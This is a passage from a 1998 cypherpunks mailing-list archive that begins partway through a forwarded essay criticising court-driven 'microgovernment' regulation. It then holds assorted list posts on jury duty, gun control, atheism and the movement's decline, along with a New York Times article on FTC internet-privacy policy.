woman with monocular vision to drive maintenance trucks
between airplanes. Aloha Islandair Inc. is being sued for
declining to hire a pilot with vision in only one eye. (If a plane
piloted by such a pilot were to crash, the airline could, of
course, be sued.)

Maybe one-eyed drivers and alcoholic tanker captains are
unsafe on the average, maybe not. But the important thing to
note is that the ADA never reaches that question, because it
forbids basing policy on averages. A bureaucratic rule might
say that if 90 percent of Exxon's jobs are available to
recovering alcoholics, that is enough. But all microgovernment
"sees" is each job, and each disabled person, and each
person's right to accommodation. Microgovernment is
one-eyed.

The threat of ADA lawsuits may not create either jobs or
goodwill for the disabled. In a recent study, two Massachusetts
Institute of Technology economists, Joshua Angrist and Daron
Acemoglu, found that the ADA "had a substantial and
statistically significant negative effect on the employment of
disabled people under 40." But who knows? Given that court
decisions are often nebulous or conflicting, that companies
respond to those decisions in many different ways, and that
lawsuits often chase deep pockets and settlement prospects
rather than urgent national problems, microgovernment does
not actually know what it is doing, let alone whether it is doing
it well.

The question is not whether helping the disabled is a good idea;
it is whether letting lawyers do the regulating is the best
method. Successful regulatory systems work by paying
attention to measurable outcomes and by feeding knowledge
about success or failure back into the system. Goals set by
bureaucrats and politicians may or may not be wise, but usually
it is at least possible to know whether a given regulation
succeeds at, say, reducing sulfur emissions or stabilizing freight
charges. The microgovernmental model, by contrast, sets no
overall goals, measures no outcomes, allows for little or no
evaluation of effectiveness or cost vs. benefit, writes few
unambiguous rules, allows no formal public comment even in
cases with sweeping ramifications, exiles politicians to the fringe
of policy-making, and buys us-well, we have no idea what it
buys us. If your goal was to design a regulatory regime that
violated every standard rule of good regulatory practice, you
could hardly do better.

Strip Search

Microgovernment is micro in another sense: not only is it
radically decentralized, but it pokes its nose into everything,
and no corner of life is too small for it to reach. Its
mandate-attaining fairness in every personal
environment-acts as a little microlever, prying here and prying
there, opening one door after another to the onslaught of legal
process.

Ask the PGA. Or ask Bill Clinton, whose sex life was scoured
in fine detail by Paula Corbin Jones' lawyers, thus giving an
enthusiastic microregulator a taste of his own medicine.
Clinton's alleged conduct with Jones was, at least, patently
disgusting. In many cases, distinguishing workplace harassment
from ordinary flirting is difficult; courts must go to great lengths
to do it.

Workplace harassment law was entirely cooked up by the
courts, and is entirely driven by the mandate for fairness in
particular cases. It therefore serves as a good example of the
microgovernmental regulatory style in its purest form. In Oncale
vs. Sundowner Offshore Services Inc., the Supreme Court
ruled this year that discriminatory same-sex harassment is
illegal. What exactly is harassment, and when is it
discriminatory, as opposed to merely, say, mean? The court
helpfully announced that a male football coach may smack a
player on the behind as the player runs onto the field, but may
not smack a secretary (male or female) on the behind in the
back office. Well, what about the locker room? In case the
exact line of demarcation eludes you, the regulators-meaning
the court-provided this guidance:

"The real social impact of workplace behavior often depends
on a constellation of surrounding circumstances, expectations,
and relationships which are not fully captured by a simple
recitation of the words used or the physical acts performed.
Common sense, and an appropriate sensitivity to social
context, will enable courts and juries to distinguish between
simple teasing or roughhousing among members of the same
sex, and conduct which a reasonable person in the plaintiff's
position would find severely hostile or abusive."

This is rather as if the EPA had defined illegal pollution by
saying: "We know it when we see it." To decide whether
harassment has occurred, the court needs to sort through "a
constellation of surrounding circumstances, expectations, and
relationships"-in other words, the intricacies of each
relationship in each workplace situation in each case. Every
joke, every dinner invitation, every friendship becomes a
courtroom exhibit, aswarm with lawyers. Who told which dirty
joke, how often? Who was friends with whom? What did that
dinner invitation signify? In a recent racial-harassment case
involving a black plaintiff and an Asian plaintiff suing their
former employer in Los Angeles, lawyers busied themselves
debating who was more offensive to whom. Remarks to
plaintiffs: "You don't sound like you're black." "Why are your
people's faces so shiny?" "You know, we bombed you
[Japanese] once. We'll do it again." Remarks by plaintiffs:
"dumb Polack," "white trash," "crackers," "redneck," "fucking
Korean." The jury decided the workplace was hostile and
ordered the company to pay $1.9 million.

Given that a microgovernmental lawsuit is often the legal
equivalent of a strip search, the prudent employer
understandably takes no chances on jokes, teasing, or personal
comments around the office. Lately, legal experts are advising
employers not to let workers recount stories from the movie
There's Something About Mary, a sophomoric comedy whose
scenes include, for instance, some business about genitals
caught in a zipper. "If you are telling these kind of jokes, no
matter where they're coming from, you're exposing yourself to
a sexual-harassment claim," Allen Rad, an employment lawyer,
told The Dallas Morning News in July. "You're better off just
not talking about it."

Subjecting each workplace, each job, each relationship, each
joke to exhaustive legal scrutiny can devastate communities that
depend on trust. In Seattle, two successive support groups for
gay city employees have collapsed under the weight of legal
processes launched by a hostile heterosexual man who was
determined to attend their meetings. "I was attempting to find
out what special privileges they were being given," says Philip
Irvin, a city engineer who favors biblical morality and secular
laws criminalizing sodomy. When the gays tried to keep him
out, he filed discrimination charges, and last year the city's civil
rights office found in his favor. The case grinds on through its
eighth year of appeals. Exhausted by the wrangling, the group
has not met since 1997.

At the end of the day, as the law thrashes about and tries to
make every personal environment fair, the results often become
simply bizarre. In one notorious recent case, the restaurant
chain Hooters, whose calling card is its scantily clad waitresses,
paid a $3.75 million settlement (of which almost half went to
lawyers) after three men were turned down for waitressing
jobs. A bureaucracy looking at the labor market as a whole,
with its 370,000 places to eat, might have decided that letting
some restaurants specialize in underdressed female servers is
not a terrible thing. Microgovernment, however, sees only the
unfairness in each particular case. Discrimination in allocating
even one serving job is too much.

The law (under Title IX of the 1972 Education Amendments)
forbids sex discrimination in education programs. In classic
micro style, judges and juries have interpreted this to mean that
each particular school needs to spend as much on women's
sports as it does on men's; because women are less interested
in sports, this has meant achieving equality by shutting down
men's college teams across the country. According to a
National Collegiate Athletic Association survey, men's
gymnastics teams are down to 32, from 133 in 1975. To
comply with a legal settlement, California State University
(Northridge) dropped baseball, soccer, swimming and
volleyball.

Elementary and secondary schools are now getting the same
treatment. ABC's 20/20 noted in May that a lawsuit by two
softball players, Jennifer and Jessica Daniels, required Merritt
Island High School, in Florida, to mothball a concession stand,
a scoreboard and bleachers that parents donated for the boys'
baseball field unless the same items were also donated for the
girls' softball field. When the program asked the girls' lawyer
why she was requesting quadruple legal costs, she replied,
"Because we put that money into other lawsuits." She is
currently suing 10 high schools. Thus the mindless totalism that
gives microgovernment its characteristic resemblance to a
lawnmower propelling itself through a rose garden.

Termite Attack

No doubt it is intrusive, in some sense, to require steel makers
to put scrubbers on their smokestacks, or landowners to
preserve wetlands. Yet the relationships interfered with are
business relationships, and the requirements are, at bottom,
economic. Microgovernment is of a different complexion. "It's
us and our personal behavior," says Robert E. Litan, a
Brookings Institution economist and former Clinton
administration regulator. "This is telling people how they have
to behave." For government, policing jokes at work, or
ordering colleges to set up as many press interviews for female
athletes as for males, or fining the producers of Melrose Place
$5 million for refusing to allow a pregnant actress to play a
bikini-clad seductress, represents a higher and stranger order
of intrusiveness. Never before has the government concerned
itself so minutely with the detailed interactions of everyday life.

Moreover, microgovernment creeps toward you like a swarm
of subterranean termites, rather than charging you like an angry
elephant. There is no city hall to fight, no bureaucrat to argue
with. "There is no forum in which you're having a national,
public dialogue about these questions," says Nivola. "It's not
happening in a legislature. It's taking place in a myriad of
courtrooms, and the cumulative effect of it is the regime. It's so
decentralized that it doesn't offer a visible target."

No one has any idea how much microgovernment costs. It may
well be less expensive than traditional regulation, given the high
costs of such old standbys as trade protections and price
controls. However, microgovernment's costs are best
measured not in money but in government's loss of respect for
people, and people's loss of respect for government. If the
excesses of 1960s and 1970s regulation destroyed the public's
confidence in the bureaucracy, what will the greater and
weirder excesses of microgovernment do to the public's
confidence in the judiciary? And how much grinding up of
personal and professional relationships is required before
someone figures out a way to stop the lawnmower?

Eventually, somehow, someone will. But no one has done so
yet. Microgovernment is in its gaudy first flowering, protected
from the traditional checks on regulatory excess by its moral
prestige as a defender of rights. Indeed, few people even
realize that it is regulation. President Bush embraced the
ultramicro Americans With Disabilities Act, even as his own
vice presidential Council on Competitiveness swore to thwart
regulation. President Clinton thinks nothing of demanding a
patients' bill of rights, even as his own vice president drums
away at the importance of holding regulators accountable to
results rather than to process.

In time, either there will be reforms-of a sort not yet
invented-or microgovernment will simply collapse, as
irrational and unaccountable forms of governance eventually
do. America's extraordinary experiment in regulation without
regulators will fail, and the country will move on. But what will
be the condition of the law when that time comes?
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jason roks <downloads@hlserver.com>
Date: Wed, 23 Sep 1998 16:04:57 +0800
To: cypherpunks@toad.com ()
Subject: PC Beta Download (was Re: Download Info (Form) PC)
In-Reply-To: <199809222208.SAA05453@sol00320.dynamicweb.net>
Message-ID: <v0311072eb22f0f48390b@[207.245.14.171]>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

Thanks for checking out Hotline. We hope you enjoy our software and tell
all your friends. Please check back at our web site for the latest news
about Hotline Communications Ltd.

To purchase licenses for Hotline software please visit our secure
transaction server at http://www.HotlineSW.com

If you experienced any difficulties downloading the evaluation software you
can try again from our secondary distribution server:
ftp://ftp.hlserver.com

If you have any technical questions please contact mailto:support@HotlineSW.com

kindest regards,

jr
--




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jason roks

business development
HOTLINE COMMUNICATIONS LTD.
tel: 416.531.7804

jason@HotlineSW.com

http://www.HotlineSW.com
HOTLINE office: hlserver.com (207.245.14.170)
HOTLINE Tracker: hltracker.com (207.245.14.170)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"There is more than the web!."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 23 Sep 1998 10:10:00 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199809231505.RAA24019@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh wow, thanks for the update on the Clinton situation.  I'm grateful
since I couldn't find that information anywhere else, unless of course
I looked in the FIVE BILLION OTHER FORUMS BEATING THIS
GODDAMNED SUBJECT INTO THE GROUND!

Please do me a favor and FUCK OFF, or go stick your head up Clinton's
ass and quit spamming the list with FUCKING GARBAGE!  This shit is
worse than the sixdegrees mail.


At 06:15 AM 9/23/98 +0200, Anonymous wrote:
>To all: 
>We don't care so much that WJC did it with Buddy,
>or whatever, so much that he lied under oath.
>
>It is only rarely we get the sons of bitches on
>tape, and then you'll have to pardon us for 
>exploiting it.
>
>What the fuck, the TLAs leveraged their POTUS bugs for
>years...
>
>The only regret is that Frank Zappa was not alive
>to put it all to music.
>
>Oottoott
>
>
>
>Count of Monte Carlo
>
>
>
>
>
>
>
>
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tyrone W. Grandison" <tgrandsn@uwimona.edu.jm>
Date: Wed, 23 Sep 1998 17:30:13 +0800
To: cypherpunks@toad.com
Subject: Inquiry
In-Reply-To: <199809231354.JAA00327@relay1.planetall.com>
Message-ID: <Pine.SUN.3.95.980923171925.480D-100000@minotaur.uwimona.edu.jm>
MIME-Version: 1.0
Content-Type: text/plain





CAn someone point to where I may find a good documentatio on a NNTP server
(and possibly documentation) ?

Thanks,
  T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff" <kurtbuff@halcyon.com>
Date: Wed, 23 Sep 1998 20:43:38 +0800
To: <cypherpunks@toad.com>
Subject: RE:
In-Reply-To: <199809230415.GAA08863@replay.com>
Message-ID: <000f01bde75a$e2c9a2a0$1b01010a@boar.minuteman.org>
MIME-Version: 1.0
Content-Type: text/plain



Well, yes, there *is* a problem in defining your stance by opposition to
others, but the term is useful, nonetheless.

Simply saying "unchurched" or "realist" or "non-religous" sometimes simply
doesn't say enough, or mean enough to others to convey all of the meaning
necessary.

| At 09:00 PM 9/21/98 -0700, Kurt Buff wrote:
|
| >I (as a militant atheist) merely say that if you can define
| your God, I can
| >probably prove he doesn't exist. Unless, of course, your
| definition is so
| >broad as to have no meaning in the first place.
|
| As a thinker I find the term atheism dignifies the
| concept of theism, so I find it offensive.  Theists
| are primitives and one needn't stoop.
|
| In my religion, saying unprovable things in public
| is a stonable offense.
|
| Joe Momma




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 23 Sep 1998 18:10:58 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Inquiry (fwd)
Message-ID: <199809232337.SAA12426@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Sep 1998 17:20:43 -0500 (GMT-0500)
> From: "Tyrone W. Grandison" <tgrandsn@uwimona.edu.jm>
> Subject: Inquiry

> 
> CAn someone point to where I may find a good documentatio on a NNTP server
> (and possibly documentation) ?
> 

Linux


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 23 Sep 1998 18:00:40 +0800
To: "Me Michel Kelly-Gagnon" <Alexdoulis@aol.com>
Subject: Apologies: mistakes on my statistics...  Reality is *worse* than I believed or remembered!
Message-ID: <199809232250.SAA25339@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



----------- from CFD V2 #602 ----------------
>From a post by Jean Hogue <jean_hogue@sympatico.ca> 
(Wed, 23 Sep 1998 Subject: a few impressions on the rallye)

[snip]
    - Quebec is waking up and joining in

    - the ban on "purse-sized" pepper spray -- that says it all.

    -   60 millions/year forever for gun control bureaucrats,
         4 millions/year for 5 years for cancer research

        38 women murdered with a firearm last lyear  
      3900 women died of breast cancer last year
        if this is not a feminist issue, what is ?

    - the 60 million/year maintenance cost is almost as high as the
      "total 7-year cost" of 85 millions promised for the entire program.

       by 2015, the total tab will be 1 billion dollars.

    - the gripping testimony of John St-Amour (Marstar)

        - the brutality of the search for mere _papers_
           SWAT with the finger on the trigger of HK MP-5 weapoons
           and using the weapons to point where to go to
        - the systematic harrassment of the government pursuing a non-
              case demanding St-Amour plead guilty to some trivial charges
              as condition  to stop this 3-year long harrassment
        - over $100,000 in legal fees
        - the role of Canada Customs, describing St-Amour as "violent"
        - the government has unlimited funds (taxpayers' money) and can
          outspend anyone and drag anyone through court forever
        - trumped-up charges of "unsafe storage" to justify the fiasco.
        - this can happen to _anyone_.  C-68 allows searching for 
              records, unsafe storage charges are routinely fabricated


Spin doctoring from McLellan [minister of Justice]

    - talk of confiscation is paranoid
    - the registry will be cost-effective
    - used weeping mothers of Polytechnique killings as prop for C-68

[snip]
--------- end of quote ----------------

Ciao

jfa







Definition:  FASCISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 23 Sep 1998 21:06:17 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <19980924015428.2767.qmail@hades.rpini.com>
Message-ID: <v04101900b22f59c441e1@[192.168.16.6]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:54 AM +0000 9/24/98, Anonymous wrote:
>So you basically wind up with juries which are stacked with welfare
>recipients, stupid people, and retirees. A jury of retirees may work, but
>the others surely don't.
>
Actually, the last time that I was called, the largest proportion of potential
jurors were people who work for the government in one form or another.

City park workers, school teachers, post office workers, clerical workers
who work at city hall, etc.

Retirees were the next largest group.

Between the two, they accounted for 80+ of the jury pool.

-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

"Yes, the president should resign. He has lied to the American people time 
and time again, and betrayed their trust.  He is no longer an effective 
leader.  Since he has admitted guilt, there is no reason to put the 
American people through an impeachment.  He will serve absolutely no 
purpose in finishing out his term, the only possible solution is for the 
president to save some dignity and resign."
	
	-- William Jefferson Clinton
	    speaking in 1974 about President Nixon and Watergate




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 23 Sep 1998 21:25:23 +0800
To: Tim May <cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <3.0.5.32.19980922231122.00907100@idiom.com>
Message-ID: <199809240225.TAA21955@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 12:09 AM 9/23/98 -0700, Tim May wrote:
> Yet some of the apolitical numbskulls I know about have
> served on several juries in the same time. The Poisson, as
> expected, or something more human?

I have often read allegations of manifest jury rigging, but
from highly unreliable sources.

If juries are routinely rigged, then we would expect a high
number of repeats, particularly in politically sensitive
cases such as taxes, drugs, or organized crime.  We would
expect a drug jury to be composed primarily of people who
have been repeatedly called for a drug jury previously.  If
juries are rigged, it should be easy to check statistically.
Simply compare the number of repeats at a jury call with the
expected number of repeats.

To rig a jury by excluding undesirables such as Tim May would
be far too laborious.  To rig a jury it would be necessary to
include only desirables, thus the pool from which the jury is
selected would be vastly smaller than the official pool, and
simple statistics would show this up.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     36kfZmqoLcEiOYb2EmT85BRIwhd8rlU2mEbg9tAo
     423cg9OMSTWTZb0pVq0EhzhtObK62XbWKkGvWVSHk
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 23 Sep 1998 19:11:29 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Invading Switzerland in WW2, pro and con (fwd)
Message-ID: <199809240038.TAA12572@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Richard Redd" <rredd@earthlink.net>
> To: <consim-l@net.uni-c.dk>
> Subject: Re: Invading Switzerland in WW2, pro and con
> Date: Wed, 23 Sep 1998 17:56:11 -0600

> Of course there's the old story about some conqueror (I think it was Hitler
> saying, "I could invade your country with 100,000 men". The Swiss diplomat
> says, "Every man would fire their rifles at the invader". "Well, suppose I
> send 200,00?"  "Then every one would fire twice."


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 23 Sep 1998 14:19:53 +0800
To: cypherpunks@cyberpass.net
Subject: Cypherpunks defeat?
Message-ID: <199809231921.VAA12284@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:02 AM -0500 9/24/98, Albert P. Franco, II wrote:

>I think perhaps a tougher question is, "Is there a way, without resorting
>to bloodshed, to regain control of our private property and private lives?"
>That's not a troll! I know that there are a lot people on this list with
>their assault rifles at the ready, that are convinced that only armed
>resistance will work. But. I think that's the "easy" way out. (How) can it
>be done another way?

It's ironic that you would have to ask that question here.

The cypherpunks group was founded on this very premise: that through the
use of cryptography, people would become able to engage in a wide range
of voluntary transactions, outside of the reach of meddling interlopers.

Most cypherpunks have become disillusioned about their dreams, and you
will seldom hear them defend the notion that cryptography offers any kind
of alternative to a society based on coercion.  The past few years have
been hard ones.  The failure of digital cash, the gradual trend towards
a debate over when and how (rather than whether) to regulate domestic
cryptography, widespread abuse of anonymity, all these make the original
cypherpunk goals seem even more distant today than in the past.

Is the cypherpunks dream dead?  Is the movement over?

Maybe it is time to give up.  Throw in the towel, admit that we lost.
Sure, there are still battles to be fought, rear-ground actions where we
can perhaps delay the inevitable outcome.  But the vision has been lost,
and all that is left is the post-mortem analysis of the failed dream.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 23 Sep 1998 21:32:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Jury duty considered harmful, or at least rare (fwd)
Message-ID: <199809240300.WAA13172@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Sep 1998 19:12:01 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: Jury duty considered harmful, or at least rare

> To rig a jury by excluding undesirables such as Tim May would
> be far too laborious.  To rig a jury it would be necessary to

Not in the days of computerized records it isn't.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 23 Sep 1998 21:48:46 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: IP: Microgov't: Old Red Tape Looks Good in Comparison (fwd)
Message-ID: <199809240317.WAA13306@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Sep 1998 16:47:14 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: IP: Microgov't: Old Red Tape Looks Good in Comparison

> Imagine that, instead of a Clean Air Act, with its endless rules
> for sulfides and scrubbers, we just had a Clean Air Bill of
> Rights: "No corporation or business establishment shall impose
> an unfair, excessive or unreasonable burden of air pollution on
> any person or group."
 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
[other related material deleted for space]
 
>  Write down the finished rules, and make them clear
>  enough to comply with;

That's what amendnments or for.

>  Don't give bureaucrats a financial stake in their
>  actions-for instance, don't let them pocket the fines
>  they levy, lest they turn regulation into a money-making
>  scheme;

I believe there is already a clause that stipulates that *any* material
taken for public use *must* be paid for. There is no latitude for how the
person got it.

> Microgovernment is micro in another sense: not only is it
> radically decentralized, but it pokes its nose into everything,
> and no corner of life is too small for it to reach. Its
> mandate-attaining fairness in every personal
> environment-acts as a little microlever, prying here and prying
> there, opening one door after another to the onslaught of legal
> process.

 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 23 Sep 1998 21:50:23 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: From Spyking: DNA Technology (fwd)
Message-ID: <199809240319.WAA13350@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 25 Sep 1998 04:32:13 +0200
> From: "Albert P. Franco, II" <apf2@ctv.es>
> Subject: From Spyking: DNA Technology

> the target. Now they'll have the tools to do it. The same cop investigating
> your car this month could inadvertently (or not) deposit a few traces of
> your skin dust at the scene of a crime next month. They keep getting
> scarier all the time!

This is exactly why we won't see this become standard practice in the
majority of cases, the expense of guaranteeing the evidence trail.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 02:29:32 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Privacy: FTC Losing Patience w/Business
Message-ID: <199809240731.AAA25674@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy: FTC Losing Patience w/Business
Date: Wed, 23 Sep 1998 07:33:09 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/98/09/biztech/articles/21privacy.html

September 21, 1998

F.T.C. 'Losing Patience' With Business on
Web Privacy

By JOEL BRINKLEY

WASHINGTON -- After more than a year of heated debate within the
government, the Federal Trade Commission has all but decided that it is
going to part company with the Clinton administration over the contention
that business can regulate itself when it comes to Internet privacy. 

"We are losing patience with self-regulation," David Medine, an associate
director in the commission's Bureau of Consumer Protection, said in an
interview, reflecting the larger agency opinion on this issue. "It's too
bad, but I think industry has lost the opportunity to show that they will
do it on their own." 

What was the last straw? Within the F.T.C., they called it "the Big Surf."  

>From all corners of the agency's headquarters in the spring, dozens of
lawyers trooped to special training rooms equipped with personal computers
and high-speed Internet connections. And for two weeks, they spent their
days trolling the World Wide Web, searching for privacy problems. 

Their intention was to find Web sites that collected personal information
from visitors but neglected to post any notice about how that information
would be used. The presumption was that many of the companies sold the
information -- some of it highly personal data on health, income and
personal preferences -- to Internet-list brokers, merchants and advertisers. 

The "surfers" had no idea what they would find; no one had ever dedicated
the time and manpower needed for this sort of targeted survey of the vast,
tangled, largely unfathomable network that is the World Wide Web. But the
Big Surf produced startling results published in a report this summer. More
than 90 percent of the roughly 1,400 sites examined collected personal
information from visitors, but only 14 percent of them disclosed how that
information would be used, convincing the F.T.C. that formal regulation
would probably be necessary. 

For more than a year, the Clinton White House had been saying that
businesses using the Internet should be allowed to regulate themselves.  

"If there's ever an arena that should be market driven, this is it," Ira
Magaziner, President Clinton's adviser on Internet issues, said as the
White House announced its Internet policy last year. 

But while the White House was formulating this strategy, a few blocks away
at the F.T.C. -- an independent federal agency not beholden to the
administration -- agency officials were conducting hearings and workshops
on Internet privacy, listening to complaints from members of Congress and
interest groups. They were also installing up-to-date computer equipment so
the agency could carry out the Big Surf and add the Internet to the list of
business arenas subject to F.T.C. scrutiny and enforcement. 

Now, with results from the Big Surf and the industry's reaction to it in
hand, several senior F.T.C. officials said, the agency will give industry
just a few more months to respond to the recommendations in its report by
demonstrating that it is effectively regulating itself.  

Medine said he would expect the industry to conduct a survey like the Big
Surf and hand over the results. If, as most commission officials expect,
industry does not provide such proof, the F.T.C. will draft a bill calling
for clear Internet privacy standards and ask Congress to pass it.  

As an independent agency, the commission does not have to get permission
from the Clinton administration to do this. And, given Congress' repeated
statements of concern about Internet privacy, a bill would probably get the
votes needed to pass. 

"It's not our intention to over-regulate," said Jodie Bernstein, director
of the agency's consumer protection bureau. "We don't want to chill new
technologies." But, she added, Web sites must begin "telling consumers if
they are collecting personal information, what they are going to do with it
and how the consumers can get out of it, if they want to." 

Generally, that means posting a privacy statement that answers these
questions. But since the results of the Big Surf were published in June,
commission lawyers have begun to believe that some Web sites are actually
choosing not to post privacy statements.  

"There's now a perverse, reverse incentive," said Ori Lev, an F.T.C.
official involved in Internet enforcement. "If you don't post a privacy
policy, we can't go after you." 

That became clear last month, after the commission reached a settlement
with Geocities, a popular site on the World Wide Web that the commission
had accused of lying to its 2 million subscribers. The site offered a
privacy statement that promised not to give out personal information
collected during registration without permission. But the commission found
that Geocities was selling the information anyway. That supposed deception
was the basis for the government's case.  

If Geocities had not promised to keep the information private, then it
would probably not have run afoul of the F.T.C.. As a result, Medine said,
"clearly there are a lot of corporate lawyers advising their Web clients
not to do anything now" -- not to post a privacy statement or anything else. 

Connie LaMotta, a senior vice president with the Direct Marketing
Association, calls that idea nonsense. "It's a very bureaucratic way of
thinking," she said. "It's upside down. Businesses want to post privacy
statements to establish good customer relationships and customer service.
Industry is stepping up to the plate on this." 

Ms. LaMotta said she and others in the industry agreed with the F.T.C.'s
